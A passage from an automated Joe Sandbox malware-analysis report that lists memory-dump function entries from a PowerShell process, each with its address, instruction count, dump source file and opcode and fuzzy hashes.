                                                                                            • Instruction Fuzzy Hash: 5EC28370A00219DFDB24DF64C854BDAB7B2AF85344F10C4A9D90AAB785DB71ED82CF91
                                                                                            Function 07195230 Relevance: 1.1, Instructions: 1099COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2517849840.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7190000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c547e2190652223bc5abc17ae24a29168abb25e2baef39a01d09cd718049a254
                                                                                            • Instruction ID: 73046ff77ab23ea43d2021434a5a98b2b6bce6cb54041afbab0c8cc796ee3456
                                                                                            • Opcode Fuzzy Hash: c547e2190652223bc5abc17ae24a29168abb25e2baef39a01d09cd718049a254
                                                                                            • Instruction Fuzzy Hash: 46A25DB4A00215CFDB25DBA8C454B99BBB2BF85704F258169E905AF386CB72EC42CF51
                                                                                            Function 047695A8 Relevance: 1.0, Instructions: 1032COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2511458490.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_4760000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3beee138fe0367f34a2104729a8d7f205bdecd9a4a024ea9eec10ca84ff5ae14
                                                                                            • Instruction ID: f4d9cc96afcf79f01799297c1cef5a1731654b23d3f757e86cb5f935ba72545a
                                                                                            • Opcode Fuzzy Hash: 3beee138fe0367f34a2104729a8d7f205bdecd9a4a024ea9eec10ca84ff5ae14
                                                                                            • Instruction Fuzzy Hash: 1D8204B09093949FCB06CF68D4A09DDBFB2AF46310F198197E945DB363C634AD49CB91
                                                                                            Function 071935B8 Relevance: .9, Instructions: 904COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2517849840.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7190000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 894080fe9413fe2b25ba2d485698e49a12591ead0e9b6680f0b3655bf6fcb6df
                                                                                            • Instruction ID: 0a3b3852ce52ab39493476e2f197b4b2f8a99a61fc993a123975449e5e7cc0b0
                                                                                            • Opcode Fuzzy Hash: 894080fe9413fe2b25ba2d485698e49a12591ead0e9b6680f0b3655bf6fcb6df
                                                                                            • Instruction Fuzzy Hash: CC8280B0A00255CFDB24DB68C850B9EB7B2BF85304F14C5A9D91AAB784DB71ED42CF91
                                                                                            Function 07195212 Relevance: .9, Instructions: 892COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2517849840.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7190000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9adf5d224cd3f487367c529e16e1576f3dfd50edec7034878e93ecb9e2d44e8a
                                                                                            • Instruction ID: 328d7ff33a86fc445660b156e3a177ab98578398006e880f4b87e7c489911f39
                                                                                            • Opcode Fuzzy Hash: 9adf5d224cd3f487367c529e16e1576f3dfd50edec7034878e93ecb9e2d44e8a
                                                                                            • Instruction Fuzzy Hash: D8827BB4A00255CFDB25DB64C454B99BBB2BF89704F2581A9E905AF3C6CB72EC42CF41
                                                                                            Function 071943DA Relevance: .9, Instructions: 888COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2517849840.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7190000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 83e0859a7103058b3fc2eb0a274e134a075a8e1a4325940b14952975637f61ab
                                                                                            • Instruction ID: 8cb422b4e4a85cc82928648260d144a388af69858a52923df22028240fdbbff2
                                                                                            • Opcode Fuzzy Hash: 83e0859a7103058b3fc2eb0a274e134a075a8e1a4325940b14952975637f61ab
                                                                                            • Instruction Fuzzy Hash: 8882B2B0A00255DFDB24DB64C850BAFB7B2AF85304F14C5A9D90A6B784DB71ED82CF91
                                                                                            Function 071935AF Relevance: .8, Instructions: 818COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2517849840.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7190000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 78ba47120125c223a9e0e49d3b9a8d82beadad1fe80b2ba7103a11f08ee1fc0a
                                                                                            • Instruction ID: 3dd9b4a98d8e5ff3013da6b4e18b6114f3ce0dfa72c54cd9f9104cd53ebf8ca3
                                                                                            • Opcode Fuzzy Hash: 78ba47120125c223a9e0e49d3b9a8d82beadad1fe80b2ba7103a11f08ee1fc0a
                                                                                            • Instruction Fuzzy Hash: A472AFB0A00255DFDB24DB68C850B9EB7B2BF84304F14C5A9D91A6B784DB71ED82CF91
                                                                                            Function 08F816C8 Relevance: .7, Instructions: 706COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2532299871.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_8f80000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2d7f4ef0aee94e594c21e8281026b4b91f77020f8e32c680ba2f9f837ec769b9
                                                                                            • Instruction ID: 71c12366efd14079e78b613b796178e46b49e2758439f5b64ee1632612788d15
                                                                                            • Opcode Fuzzy Hash: 2d7f4ef0aee94e594c21e8281026b4b91f77020f8e32c680ba2f9f837ec769b9
                                                                                            • Instruction Fuzzy Hash: 4C42A271F00205DFDB24EF78C454AAABBB2AF85252F24C26ED9059B355DB31D883CB91
                                                                                            Function 071945A4 Relevance: .6, Instructions: 648COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2517849840.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7190000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 60ed7104a58f3f599a4929006a481d9428055465eaa2545226e877071d653344
                                                                                            • Instruction ID: 339fe8a0ab77e9abddf1ad67232d185c3fb465209dacb6b2f06ce4c1e4e29d1e
                                                                                            • Opcode Fuzzy Hash: 60ed7104a58f3f599a4929006a481d9428055465eaa2545226e877071d653344
                                                                                            • Instruction Fuzzy Hash: 47528FB0A00655DFDB20DB64C860F9EB7B2AF84304F14C5A9D90A6B785DB71ED82CF91
                                                                                            Function 07191228 Relevance: .6, Instructions: 598COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2517849840.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7190000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5f7aaa385316a160cb521f408996cc8215ff0e9616df7525dfb09794d4b229a6
                                                                                            • Instruction ID: cd626f007d72ab96567d0a01507aac747e15174c231f37547fa8228b2dcf9821
                                                                                            • Opcode Fuzzy Hash: 5f7aaa385316a160cb521f408996cc8215ff0e9616df7525dfb09794d4b229a6
                                                                                            • Instruction Fuzzy Hash: 9732A370F0025AEFDB15CB98C444B9ABBB2AFC6714F15C069E5059B391DB72DC82CB92
                                                                                            Function 0719DE9C Relevance: .4, Instructions: 435COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2517849840.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7190000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3fefcdb416e47ea3fdde739040c13a72b2fce4478bde217c6aaa9ce26d4c8c79
                                                                                            • Instruction ID: dd50935ede617ec68a34d68f4a76e27413f332b516b750677bf7e4a6c2806d5b
                                                                                            • Opcode Fuzzy Hash: 3fefcdb416e47ea3fdde739040c13a72b2fce4478bde217c6aaa9ce26d4c8c79
                                                                                            • Instruction Fuzzy Hash: 8C1260B1A00219DFEB65CB14C854BAAB7B2BF45700F05C4E9D90AAB780DB71ED86CF51
                                                                                            Function 0719DC91 Relevance: .4, Instructions: 431COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2517849840.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7190000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fce830a0a15085a08ad1968868c2d430b549977f6a7c26c490d5f2684c68be5b
                                                                                            • Instruction ID: 7c1c5b08d316005011dc555ac0af98041f4bbafdcba64e68ef588c50caeeea37
                                                                                            • Opcode Fuzzy Hash: fce830a0a15085a08ad1968868c2d430b549977f6a7c26c490d5f2684c68be5b
                                                                                            • Instruction Fuzzy Hash: 21124FB1A00219DFEB65CB14C854BAAB7B2BF45700F11C4E9D90AAB780DB71ED86CF51
                                                                                            Function 08F91800 Relevance: .4, Instructions: 427COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2532559046.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_8f90000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 61bdbb7a6db82e1eeecabee05f0ca3b46e5a67e14ec31fed3640601850fd3ec5
                                                                                            • Instruction ID: 88cbef2a0f45640eb7bc1437da5ecfe07f631f24e5ac39ae23c1d20aef219101
                                                                                            • Opcode Fuzzy Hash: 61bdbb7a6db82e1eeecabee05f0ca3b46e5a67e14ec31fed3640601850fd3ec5
                                                                                            • Instruction Fuzzy Hash: 19021C75A00219DFDF15CFA8D484AADBBB2FF88310F248169E945AB365C735ED81CB90
                                                                                            Function 08F90E28 Relevance: .4, Instructions: 395COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2532559046.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_8f90000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 86ddc07d59ab78fd36ae82cb33d1e322ad9e3e2b205eb4a0ec16ca9284246741
                                                                                            • Instruction ID: f6aa4c5bed4f2c439acdb439de5b73bf3550e2578a7280ca88fbadd310971b37
                                                                                            • Opcode Fuzzy Hash: 86ddc07d59ab78fd36ae82cb33d1e322ad9e3e2b205eb4a0ec16ca9284246741
                                                                                            • Instruction Fuzzy Hash: C4F10B75A00249DFDF05CFA8C484A9EBBB2FF88314F248169E945AB365C775ED81CB90
                                                                                            Function 047672A8 Relevance: .3, Instructions: 315COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2511458490.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_4760000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5691037173c802304b4bc46fff75776657f2304ba0caf078d015eb354ffc8b66
                                                                                            • Instruction ID: add031df36c527fc48989d2badbd72cba9cfc3f0024844b9507c0ae5616ca301
                                                                                            • Opcode Fuzzy Hash: 5691037173c802304b4bc46fff75776657f2304ba0caf078d015eb354ffc8b66
                                                                                            • Instruction Fuzzy Hash: BAC1BF35A00248DFDB18DFA8C944AADBBB7FF84348F118559E806AB355DB34ED49CB80
                                                                                            Function 04762AA0 Relevance: .3, Instructions: 281COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2511458490.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_4760000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 969c10841cac45b52f59ab365cd7cec45dedf2712d7da105388cc908bbdc7e85
                                                                                            • Instruction ID: 1960ef6bc61357cb373a29d7df28fdf61eef5e2d940a30f3c090c74bf9887910
                                                                                            • Opcode Fuzzy Hash: 969c10841cac45b52f59ab365cd7cec45dedf2712d7da105388cc908bbdc7e85
                                                                                            • Instruction Fuzzy Hash: 79B1C074A04245CFC706DF58C4A09AEBBB2FF49310B1586AAD945DB3A2C735FD45CBA0
                                                                                            Function 08F81C38 Relevance: .2, Instructions: 201COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2532299871.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_8f80000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bb4b5bce287a36e4825f9b08ebd674de12b876070bf09f95ba17beda8a5ce34c
                                                                                            • Instruction ID: 8eb06d5c621f0ebb8a8c5ac0cf0addd689c3ef908f5e07f7c590572171c94c38
                                                                                            • Opcode Fuzzy Hash: bb4b5bce287a36e4825f9b08ebd674de12b876070bf09f95ba17beda8a5ce34c
                                                                                            • Instruction Fuzzy Hash: D68106B5A00204DFDB14DF68C494EA9BBB2EF88715F19C259E805AB355CB72EC82CF51
                                                                                            Function 04767A70 Relevance: .2, Instructions: 194COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2511458490.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_4760000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 66b277c898d9a2291f848a720b33119336a42d7e799241f4756269d3d2670e17
                                                                                            • Instruction ID: bf7203edc23ce41319ba9c1f1c153070301a921fc38613a9c7cdb86c3b7044a3
                                                                                            • Opcode Fuzzy Hash: 66b277c898d9a2291f848a720b33119336a42d7e799241f4756269d3d2670e17
                                                                                            • Instruction Fuzzy Hash: AA71AE30A00609CFCB19DF68C884A9EBBF6FF85354F148569D41A9B751DB70AC4ACB80
                                                                                            Function 04767BDE Relevance: .2, Instructions: 188COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2511458490.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_4760000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 48e97c7c4e43926db7a572a77af3bbf5ec22a30c965ef10ce9348c97d14801e3
                                                                                            • Instruction ID: 469b82a9c0ac07ac23979709f8ad503f48d4814ccc291befbddb49b94d394fb0
                                                                                            • Opcode Fuzzy Hash: 48e97c7c4e43926db7a572a77af3bbf5ec22a30c965ef10ce9348c97d14801e3
                                                                                            • Instruction Fuzzy Hash: 74716030A00608DFDB18DFB5D484AADBBF6FF88344F148429D816AB794DB75AD46CB80
                                                                                            Function 07190C68 Relevance: .2, Instructions: 170COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2517849840.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7190000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a68a5c525fb95a5b4db8c4cb6c9a1d672929dd9717f0bbda5509653cf8949e2f
                                                                                            • Instruction ID: 0e0aed1b65f8971a12f7fc2ce2ed8dfdd28a3f9f3a45e1daa7870763bbf8853a
                                                                                            • Opcode Fuzzy Hash: a68a5c525fb95a5b4db8c4cb6c9a1d672929dd9717f0bbda5509653cf8949e2f
                                                                                            • Instruction Fuzzy Hash: 34514BB1B043479FDF2687A9881076ABFE6AFCA211F14807BD545CB6C2DB75D842C3A1
                                                                                            Function 07198D87 Relevance: .1, Instructions: 146COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2517849840.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7190000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 066ba0558ef980bce43a982741de56e6b47f103cf83d22f88f042fda0403431b
                                                                                            • Instruction ID: ca3fe7f271e06f94bfb01e3b05d5e82ba0c512443379b814e4651ae479206148
                                                                                            • Opcode Fuzzy Hash: 066ba0558ef980bce43a982741de56e6b47f103cf83d22f88f042fda0403431b
                                                                                            • Instruction Fuzzy Hash: 0B410CB1B083568FDF168B7894645A6FBB29FD3110B2880BBC505DB2D6DB39C847C752
                                                                                            Function 07198A15 Relevance: .1, Instructions: 138COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2517849840.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7190000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0d68752a2a0fa055235720579eda57b8936ec454ac129d05ec53aaa553d917de
                                                                                            • Instruction ID: 4d08bbed5ca9ae2def41c8be9d1a080f57ba564eeed12a0fbf25068b505d1666
                                                                                            • Opcode Fuzzy Hash: 0d68752a2a0fa055235720579eda57b8936ec454ac129d05ec53aaa553d917de
                                                                                            • Instruction Fuzzy Hash: 30413BF1704151CBDF259BB89411A9EBBA29FD3A54B1484BED5428B385DB72CC02C7A2
                                                                                            Function 0476B6F1 Relevance: .1, Instructions: 128COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2511458490.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_4760000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c0b1502c74faf99483244646febc17daa79d706a4a115f1bffc2bc0bd8a86447
                                                                                            • Instruction ID: cb9cfce9d5739b4cf452e84f8f392af4bb05dbccf42a77d169d59f781036b400
                                                                                            • Opcode Fuzzy Hash: c0b1502c74faf99483244646febc17daa79d706a4a115f1bffc2bc0bd8a86447
                                                                                            • Instruction Fuzzy Hash: 38415E35B002048FDB04DBB9C454BAEBBE7EFC9310F14C029D80AAB356DE759C419BA1
                                                                                            Function 08F904E2 Relevance: .1, Instructions: 126COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2532559046.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_8f90000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6ca00891a060946305d5a6b27cf0b12bda4163738ff8bd8e8785c595befe75c2
                                                                                            • Instruction ID: 858e9054dff9df5a8dbc897013cf68d724ff5ddc47910b0c70410482be6446d5
                                                                                            • Opcode Fuzzy Hash: 6ca00891a060946305d5a6b27cf0b12bda4163738ff8bd8e8785c595befe75c2
                                                                                            • Instruction Fuzzy Hash: 2C41A630505785CFDB16CB7CC9949AABFB1FF46310729869AC491DB2A6C738AC43CB60
                                                                                            Function 04767801 Relevance: .1, Instructions: 125COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2511458490.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_4760000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: babdc7168f0629df6100d3a51de1fbc55604e20a817a754e5f8c49c02b260497
                                                                                            • Instruction ID: 8736821030c2a700be5bc5140e33b7c9be2379fddc429064c30314c43474108d
                                                                                            • Opcode Fuzzy Hash: babdc7168f0629df6100d3a51de1fbc55604e20a817a754e5f8c49c02b260497
                                                                                            • Instruction Fuzzy Hash: EA4160357002149FDB29DB78D458AAA7BF3EF89794F044469D807EB3A0DB34AD45CB90
                                                                                            Function 0476F194 Relevance: .1, Instructions: 121COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2511458490.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_4760000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2aaabf5ad36e6a35fcb8d392b1a21d9b80e20b8c47ca5487ecbdac899c7848e7
                                                                                            • Instruction ID: 35767b4e768e49e34c0d3717954adcacb0f8c009b66acbc4e528c88ddbeb040d
                                                                                            • Opcode Fuzzy Hash: 2aaabf5ad36e6a35fcb8d392b1a21d9b80e20b8c47ca5487ecbdac899c7848e7
                                                                                            • Instruction Fuzzy Hash: EB51E834A00249CFDB05DFA8D584ADE7BB2BF88310F149158D805AB3A6DB74ED85CFA0
                                                                                            Function 07190AF0 Relevance: .1, Instructions: 120COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2517849840.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_7190000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ad31ffa4b4d131c2c043b07cd8ce84cfc3d2b91830e867088fd8436f73b6aa78
                                                                                            • Instruction ID: f63c4848c541c1d1635cf8a234ecdf167fa6c5583303f0bdcef93644fa88aaab
                                                                                            • Opcode Fuzzy Hash: ad31ffa4b4d131c2c043b07cd8ce84cfc3d2b91830e867088fd8436f73b6aa78
                                                                                            • Instruction Fuzzy Hash: C8312B76700216CBCF559A79C8007AEB7A5AFC9614F24843AD916CB280EF32DA42C791
                                                                                            Function 04767A5B Relevance: .1, Instructions: 120COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2511458490.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_4760000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ea8df4a31471bc56876a8133b478ad92a2f5e79ec05c76fcd52b33fe6a069149
                                                                                            • Instruction ID: f9247f34a251ced084f6242a2f164fbec10365e0b458bd34550850f0e3b35fc5
                                                                                            • Opcode Fuzzy Hash: ea8df4a31471bc56876a8133b478ad92a2f5e79ec05c76fcd52b33fe6a069149
                                                                                            • Instruction Fuzzy Hash: 16417D70A00608DFDB18DFA9D8846EEBBF6FF88344F148469D406AB790DB75AC45CB90
                                                                                            Function 0476B700 Relevance: .1, Instructions: 119COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2511458490.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_4760000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d12aa2ad6d8021888ee057499e396659d797ff30afdbe2b9d30b93957718d7ee
                                                                                            • Instruction ID: 6e91e0e239a03047f5a1bc3eed263f87940f52ac9cbaec32eaa844693b572287
                                                                                            • Opcode Fuzzy Hash: d12aa2ad6d8021888ee057499e396659d797ff30afdbe2b9d30b93957718d7ee
                                                                                            • Instruction Fuzzy Hash: 9E410D34B002049FDB04DBB9C454BAEBAF7EFC9310F14C469D809AB756DE75AC419B91
                                                                                            Function 08F917F0 Relevance: .1, Instructions: 117COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2532559046.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_8f90000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a586c24de92f1437409cf600e98ad8fd63d920d53b398bfc7aa1c6524e4fcef6
                                                                                            • Instruction ID: 381c75c58055f163515bba293bac8b2f0aa8ce54805b1e9362e2a8df86e96cc0
                                                                                            • Opcode Fuzzy Hash: a586c24de92f1437409cf600e98ad8fd63d920d53b398bfc7aa1c6524e4fcef6
                                                                                            • Instruction Fuzzy Hash: EB414D74E00109DFDB15CFACC4949AEBBB1FF89320B248268D555AB3A5C735EC91CB90
                                                                                            Function 08F90E18 Relevance: .1, Instructions: 114COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2532559046.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_8f90000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7d2f28507b9f7c30693ffbde9e232749696c161977cdf62680207ad680cd9f40
                                                                                            • Instruction ID: 402d7e75e128a5a4e27fc340d62ff5b48db0975108bc4d459cf07c3c2dcbe21b
                                                                                            • Opcode Fuzzy Hash: 7d2f28507b9f7c30693ffbde9e232749696c161977cdf62680207ad680cd9f40
                                                                                            • Instruction Fuzzy Hash: 34413B74E00609DFCF15CFACC9809AEBBB1FF88314B248258E955A73A5C735AC51CB90
                                                                                            Function 04762BB0 Relevance: .1, Instructions: 113COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2511458490.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_4760000_powershell.jbxd
                                                                                            Similarity
